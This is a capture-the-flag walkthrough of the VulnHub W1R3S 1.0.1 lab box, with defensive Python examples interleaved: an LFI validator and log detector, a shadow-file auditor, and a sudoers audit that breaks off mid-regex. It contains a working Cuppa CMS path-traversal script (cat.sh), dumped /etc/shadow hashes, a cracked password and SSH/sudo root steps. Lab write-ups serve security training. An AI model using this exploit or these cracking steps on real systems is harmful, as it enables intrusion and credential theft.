VulnHub Target Machine Penetration Test [W1R3S-1-0-1]

Release Date

Name: W1R3S:1.0.1
Release date: 5 February 2018

Download

  • Download: https://drive.google.com/file/d/1sWJRjku9uNWS0f_Jul24LCQ2ZLucSG4X/view?usp=sharing
  • Download (Mirror): https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip
  • Download (Torrent): https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip.torrent

Description

You have been hired to perform a penetration test on a single W1R3S.inc server and report all findings. They have asked you to obtain root access and find the flag (located in the /root directory).
Difficulty of obtaining a low-privilege shell: beginner/intermediate
Privilege escalation difficulty: beginner/intermediate
About: this is a vulnerable Ubuntu box that gives you some real-world scenarios and reminds me of the OSCP labs.
Virtual machine: VMware Workstation

v1.0.0: 2 May 2018; v1.0.1: 3 August 2018

Information Gathering

Start with nmap: a ping sweep to find the host, then a full-port version scan.

```text
root@kali:~# nmap -sn -v 192.168.66.0/24
Nmap scan report for 192.168.66.7
Host is up (0.00030s latency).
MAC Address: 00:0C:29:AA:7F:FC (VMware)
```

```text
root@kali:~# nmap -sV -Pn -v -p- 192.168.66.7
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
```

```text
root@kali:~# nmap -v -A -Pn -T5 -sV --script=vuln 192.168.66.7
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 2.0.8 or later
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /wordpress/wp-login.php: Wordpress login page.
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
| CVE-2018-1333 5.0 https://vulners.com/cve/CVE-2018-1333
| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
| CVE-2016-8740 5.0 https://vulners.com/cve/CVE-2016-8740
| CVE-2016-4979 5.0 https://vulners.com/cve/CVE-2016-4979
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
| CVE-2018-11763 4.3 https://vulners.com/cve/CVE-2018-11763
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2016-1546 4.3 https://vulners.com/cve/CVE-2016-1546
| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
990/tcp closed ftps
3306/tcp open mysql MySQL (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
```

Next, a round of directory brute-forcing against the web server with dirb.

```text
root@kali:~# dirb http://192.168.66.7/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Jan 8 01:22:15 2020
URL_BASE: http://192.168.66.7/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.66.7/ ----
==> DIRECTORY: http://192.168.66.7/administrator/
+ http://192.168.66.7/index.html (CODE:200|SIZE:11321)
==> DIRECTORY: http://192.168.66.7/javascript/
+ http://192.168.66.7/server-status (CODE:403|SIZE:277)
==> DIRECTORY: http://192.168.66.7/wordpress/

---- Entering directory: http://192.168.66.7/administrator/ ----
==> DIRECTORY: http://192.168.66.7/administrator/alerts/
==> DIRECTORY: http://192.168.66.7/administrator/api/
==> DIRECTORY: http://192.168.66.7/administrator/classes/
==> DIRECTORY: http://192.168.66.7/administrator/components/
==> DIRECTORY: http://192.168.66.7/administrator/extensions/
+ http://192.168.66.7/administrator/index.php (CODE:302|SIZE:6946)
==> DIRECTORY: http://192.168.66.7/administrator/installation/
==> DIRECTORY: http://192.168.66.7/administrator/js/
==> DIRECTORY: http://192.168.66.7/administrator/language/
==> DIRECTORY: http://192.168.66.7/administrator/media/
+ http://192.168.66.7/administrator/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.66.7/administrator/templates/

---- Entering directory: http://192.168.66.7/javascript/ ----
==> DIRECTORY: http://192.168.66.7/javascript/jquery/

---- Entering directory: http://192.168.66.7/wordpress/ ----
+ http://192.168.66.7/wordpress/index.php (CODE:200|SIZE:55879)
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/
==> DIRECTORY: http://192.168.66.7/wordpress/wp-content/
==> DIRECTORY: http://192.168.66.7/wordpress/wp-includes/
+ http://192.168.66.7/wordpress/xmlrpc.php (CODE:405|SIZE:42)

---- Entering directory: http://192.168.66.7/administrator/alerts/ ----
+ http://192.168.66.7/administrator/alerts/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.66.7/administrator/api/ ----
==> DIRECTORY: http://192.168.66.7/administrator/api/administrator/
+ http://192.168.66.7/administrator/api/index.php (CODE:200|SIZE:62)
==> DIRECTORY: http://192.168.66.7/administrator/api/test/

---- Entering directory: http://192.168.66.7/administrator/classes/ ----
==> DIRECTORY: http://192.168.66.7/administrator/classes/ajax/
+ http://192.168.66.7/administrator/classes/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.66.7/administrator/components/ ----
==> DIRECTORY: http://192.168.66.7/administrator/components/configuration/
+ http://192.168.66.7/administrator/components/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.66.7/administrator/components/menu/
==> DIRECTORY: http://192.168.66.7/administrator/components/stats/

---- Entering directory: http://192.168.66.7/administrator/extensions/ ----
==> DIRECTORY: http://192.168.66.7/administrator/extensions/banners/
==> DIRECTORY: http://192.168.66.7/administrator/extensions/content/
+ http://192.168.66.7/administrator/extensions/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.66.7/administrator/installation/ ----
==> DIRECTORY: http://192.168.66.7/administrator/installation/html/
+ http://192.168.66.7/administrator/installation/index.php (CODE:200|SIZE:4322)

---- Entering directory: http://192.168.66.7/administrator/js/ ----
==> DIRECTORY: http://192.168.66.7/administrator/js/filemanager/
+ http://192.168.66.7/administrator/js/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.66.7/administrator/js/jquery/
==> DIRECTORY: http://192.168.66.7/administrator/js/tiny_mce/


---- Entering directory: http://192.168.66.7/administrator/templates/ ----
==> DIRECTORY: http://192.168.66.7/administrator/templates/default/
+ http://192.168.66.7/administrator/templates/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.66.7/javascript/jquery/ ----
+ http://192.168.66.7/javascript/jquery/jquery (CODE:200|SIZE:284394)

---- Entering directory: http://192.168.66.7/wordpress/wp-admin/ ----
+ http://192.168.66.7/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/includes/
+ http://192.168.66.7/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.66.7/wordpress/wp-admin/user/

---- Entering directory: http://192.168.66.7/wordpress/wp-content/ ----
+ http://192.168.66.7/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.66.7/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.66.7/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.66.7/wordpress/wp-content/upgrade/
==> DIRECTORY: http://192.168.66.7/wordpress/wp-content/uploads/

---- Entering directory: http://192.168.66.7/administrator/components/configuration/ ----
==> DIRECTORY: http://192.168.66.7/administrator/components/configuration/html/
+ http://192.168.66.7/administrator/components/configuration/index.php (CODE:200|SIZE:45)

---- Entering directory: http://192.168.66.7/administrator/components/menu/ ----
==> DIRECTORY: http://192.168.66.7/administrator/components/menu/classes/
==> DIRECTORY: http://192.168.66.7/administrator/components/menu/html/
+ http://192.168.66.7/administrator/components/menu/index.php (CODE:200|SIZE:45)

---- Entering directory: http://192.168.66.7/administrator/components/stats/ ----
+ http://192.168.66.7/administrator/components/stats/index.php (CODE:200|SIZE:45)
---- Entering directory: http://192.168.66.7/administrator/templates/default/ ----
==> DIRECTORY: http://192.168.66.7/administrator/templates/default/classes/
==> DIRECTORY: http://192.168.66.7/administrator/templates/default/css/
==> DIRECTORY: http://192.168.66.7/administrator/templates/default/html/
==> DIRECTORY: http://192.168.66.7/administrator/templates/default/images/
+ http://192.168.66.7/administrator/templates/default/index.php (CODE:500|SIZE:0)

---- Entering directory: http://192.168.66.7/wordpress/wp-admin/network/ ----
+ http://192.168.66.7/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.66.7/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.66.7/wordpress/wp-admin/user/ ----
+ http://192.168.66.7/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.66.7/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://192.168.66.7/wordpress/wp-content/plugins/ ----
+ http://192.168.66.7/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.66.7/wordpress/wp-content/themes/ ----
+ http://192.168.66.7/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
```

The administrator directory turns out to be the Cuppa CMS installer. This is the page that appears when pointing the browser at /administrator.

According to the official documentation, the database must be created before the installation can be completed.

```text
Remember, the database should be created before to install Cuppa CMS.
```

First, the Cuppa CMS installation is incomplete, otherwise the setup page would not be visible. I downloaded a copy of the Cuppa CMS code to see whether any vulnerabilities could be found. Not sure whether this is a new vulnerability, but finding an LFI in alertConfigField.php at line 77 was a pleasant surprise.

To test it, I wrote cat.sh, a simple script that displays any file, as long as the web server's permissions allow reading it.

```bash
#!/bin/bash
# cat.sh: read a file from the target through the urlConfig parameter of
# alertConfigField.php. Usage: ./cat.sh /etc/passwd

_HOST=192.168.66.7
_PATH=administrator/alerts/alertConfigField.php
_PARM=urlConfig
_TRAV=../../../../../../../..

# Send the traversal path in the POST body, then trim the surrounding HTML:
# strip 8 leading spaces, keep only lines 71 onward, and drop the last two lines.
curl -s --data-urlencode "${_PARM}=${_TRAV}$1" $_HOST/$_PATH \
| sed -r 's/^ {8}//' \
| sed '71,$!d' \
| sed '$d' \
| sed '$d'
```
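The root cause of an LFI like this one is a file name taken straight from a request parameter (here urlConfig) and handed to include() after nothing more than string concatenation. The Python below is an added example, not code from this post or from Cuppa CMS: it shows the layered check a hardened handler should apply to such a parameter (decode, reject stream wrappers and absolute paths, normalise, confine to a base directory, then require an exact allowlist match) and a small detector that runs the same decoding over Apache access-log lines to surface traversal attempts. The directory CONFIG_ROOT, the allowlisted file names and the log lines are assumptions constructed for the example.

```python
import os
import re
import urllib.parse

# Hypothetical directory that a file-selecting parameter such as urlConfig should be
# confined to. The path and the allowlisted names are constructed for this example;
# they are not Cuppa CMS's real layout.
CONFIG_ROOT = "/var/www/html/administrator/components/configuration"
ALLOWED_CONFIG_FILES = {"general_config.php", "mail_config.php"}


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is judged on its final form."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_config_param(raw_value):
    """Hardened handling of a user-supplied file name destined for include().

    Returns (True, absolute_path) when the value is acceptable, otherwise
    (False, reason). The allowlist is the decisive control; the containment
    check is kept because many LFI fixes stop there, and it documents intent.
    """
    value = fully_decode(raw_value)
    if "\x00" in value:
        return False, "null byte"
    if re.match(r"^[a-z][a-z0-9+.-]*://", value, re.IGNORECASE):
        return False, "stream wrapper or URL scheme"
    if os.path.isabs(value):
        return False, "absolute path"
    candidate = os.path.normpath(os.path.join(CONFIG_ROOT, value))
    if os.path.commonpath([CONFIG_ROOT, candidate]) != CONFIG_ROOT:
        return False, "path escapes CONFIG_ROOT"
    allowed = {os.path.join(CONFIG_ROOT, name) for name in ALLOWED_CONFIG_FILES}
    if candidate not in allowed:
        return False, "file not on allowlist"
    return True, candidate


# Apache combined log format: client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def find_traversal_requests(log_lines):
    """Return (ip, timestamp, method, decoded_target, status) for every request whose
    URL carries a traversal sequence or a null byte once percent-decoding is undone."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = fully_decode(m.group("target"))
        if TRAVERSAL_RE.search(target) or "\x00" in target:
            hits.append((m.group("ip"), m.group("ts"), m.group("method"), target, m.group("status")))
    return hits


# Constructed access-log sample, not taken from the target. The first line shows why
# access logs alone are not enough: cat.sh sends urlConfig in the POST body, which
# the default log format never records.
SAMPLE_ACCESS_LOG = [
    '192.168.66.1 - - [08/Jan/2020:01:30:12 +0800] "POST /administrator/alerts/alertConfigField.php HTTP/1.1" 200 3120 "-" "curl/7.67.0"',
    '192.168.66.1 - - [08/Jan/2020:01:31:05 +0800] "GET /administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../etc/passwd HTTP/1.1" 200 2948 "-" "curl/7.67.0"',
    '192.168.66.1 - - [08/Jan/2020:01:31:40 +0800] "GET /administrator/alerts/alertConfigField.php?urlConfig=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 200 2301 "-" "curl/7.67.0"',
    '192.168.66.1 - - [08/Jan/2020:01:32:10 +0800] "GET /wordpress/index.php HTTP/1.1" 200 55879 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for probe in ("general_config.php", "../../../../../../../../etc/passwd",
                  "php://filter/resource=general_config.php"):
        print(probe, "->", check_config_param(probe))
    for hit in find_traversal_requests(SAMPLE_ACCESS_LOG):
        print("traversal attempt:", hit)
```

Because cat.sh carries the parameter in the POST body, log-based detection of this exact script needs request-body logging (for example a ModSecurity audit log) or logging inside the application; the access-log scan above only catches GET variants, which is still worth having since most scanners try those first.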

Run the script:

```text
root@kali:~# ./cat.sh /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
sshd:x:121:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
root@kali:~# ./cat.sh /etc/shadow
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::
```

We can see that three users in /etc/shadow have password hashes. Extract the hashes and feed them to hashcat for cracking.

```text
$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0
$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1
$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.
```

With a strong GPU there is not much to it: hashcat finished running the rockyou.txt wordlist against the 3 hashes in a few minutes...

Of the 3 hashes, only one was cracked...

```text
D:\hashcat-5.1.0\hashcat-5.1.0>hashcat64.exe -m 1800 password.txt --show
$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:computer
```
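From the defender's side, the same /etc/passwd and /etc/shadow data answers a different question: which accounts can actually authenticate with a password, how are those passwords stored, and which of them look out of place. The Python below is an added example, not part of the original post: it joins a constructed subset of the two files shown above, classifies each shadow entry (locked, empty, or a hash with its crypt(3) algorithm), converts the last-change field to a date, and flags a password set on a service account (www-data with /usr/sbin/nologin), password login for uid 0, weak algorithms and passwords that never expire. The sets of weak algorithms and non-interactive shells are the example's own assumptions.

```python
import re
from datetime import date, timedelta

# Constructed subset of the /etc/passwd and /etc/shadow contents shown above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
w1r3s:x:1000:1000:w1r3s,,,:/home/w1r3s:/bin/bash
mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false
"""

SAMPLE_SHADOW = """\
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
mysql:!:17554:0:99999:7:::
"""

# crypt(3) prefixes; anything not listed is reported as "unknown".
HASH_ALGORITHMS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
                   "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}
# Assumed policy sets for this example.
WEAK_ALGORITHMS = {"md5crypt", "descrypt"}
NON_INTERACTIVE_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}
EPOCH = date(1970, 1, 1)


def classify_password(field):
    """Map a shadow password field to (state, algorithm)."""
    if field == "":
        return "empty", None          # login succeeds without any password
    if field[0] in "*!":
        return "locked", None         # '*', '!', '!!' or '!<hash>' all disable password auth
    m = re.match(r"^\$([^$]+)\$", field)
    if not m:
        return "set", "descrypt"      # legacy 13-character DES crypt
    return "set", HASH_ALGORITHMS.get(m.group(1), "unknown")


def audit_accounts(passwd_text, shadow_text):
    """Join passwd and shadow by user name and return one report dict per shadow entry."""
    shells = {}
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _, uid, _, _, _, shell = line.split(":")
        shells[name] = (int(uid), shell)

    report = []
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        name, pw_field, last_change, _min_days, max_days = line.split(":")[:5]
        uid, shell = shells.get(name, (None, None))
        state, algo = classify_password(pw_field)
        findings = []
        if state == "empty":
            findings.append("empty password field: no password needed to log in")
        if state == "set":
            if algo in WEAK_ALGORITHMS or algo == "unknown":
                findings.append("weak or unrecognised hash algorithm: %s" % algo)
            if shell in NON_INTERACTIVE_SHELLS:
                findings.append("service account has a password set; it should be locked")
            if uid == 0:
                findings.append("password login enabled for uid 0")
            if max_days in ("", "99999"):
                findings.append("password never expires")
        report.append({
            "user": name, "uid": uid, "shell": shell, "state": state, "algorithm": algo,
            "last_change": EPOCH + timedelta(days=int(last_change)) if last_change else None,
            "findings": findings,
        })
    return report


def password_bearing_accounts(report):
    """Names of accounts that can authenticate with a password, in shadow order."""
    return [entry["user"] for entry in report if entry["state"] == "set"]


if __name__ == "__main__":
    for entry in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(entry["user"], entry["state"], entry["algorithm"], entry["last_change"], entry["findings"])
```

On this sample it reports exactly the three password-bearing accounts the walkthrough fed to hashcat, and www-data is the entry a reviewer should question: a web-server service account has no business holding a password hash. The last-change field also tells a story: w1r3s's password was set on 2018-02-05, the box's release date, while the locked system accounts date from the base image.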

getshell

Connect over SSH with w1r3s/computer.

```text
root@kali:~# ssh w1r3s@192.168.66.7
The authenticity of host '192.168.66.7 (192.168.66.7)' can't be established.
ECDSA key fingerprint is SHA256:/3N0PzPMqtXlj9QWJFMbCufh2W95JylZ/oF82NkAAto.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.66.7' (ECDSA) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.66.7's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.15.0-74-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

228 packages can be updated.
0 updates are security updates.

.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
w1r3s@W1R3S:~$ id
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
w1r3s@W1R3S:~$ whoami
w1r3s
```

Privilege Escalation

The w1r3s user is in the sudoers list.

```text
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s:
Matching Defaults entries for w1r3s on W1R3S.localdomain:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S.localdomain:
(ALL : ALL) ALL
```
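A `(ALL : ALL) ALL` entry is the end of the privilege-escalation story, and auditing sudoers for rules like it is the defender's counterpart. The Python below is an added example, not from the original post: it parses user-specification lines in sudoers syntax (the w1r3s rule rewritten from the `sudo -l` output above, plus constructed comparison rules) and rates each by whether it grants ALL commands, a shell binary, or NOPASSWD. The comparison rules, the shell list and the severity scheme are assumptions of the example.

```python
import re

# Constructed sudoers fragment. The w1r3s line reproduces, in sudoers syntax, the rule
# that `sudo -l` reported above; the other user lines are made-up comparison cases.
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
w1r3s   ALL=(ALL : ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(root) /bin/systemctl restart apache2, /bin/systemctl reload apache2
ops     ALL=(root) NOPASSWD: /bin/bash
"""

# user or %group, host list, optional (runas_user : runas_group), tags such as
# NOPASSWD:, then the comma-separated command list.
RULE_RE = re.compile(
    r"^(?P<who>[%+]?\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
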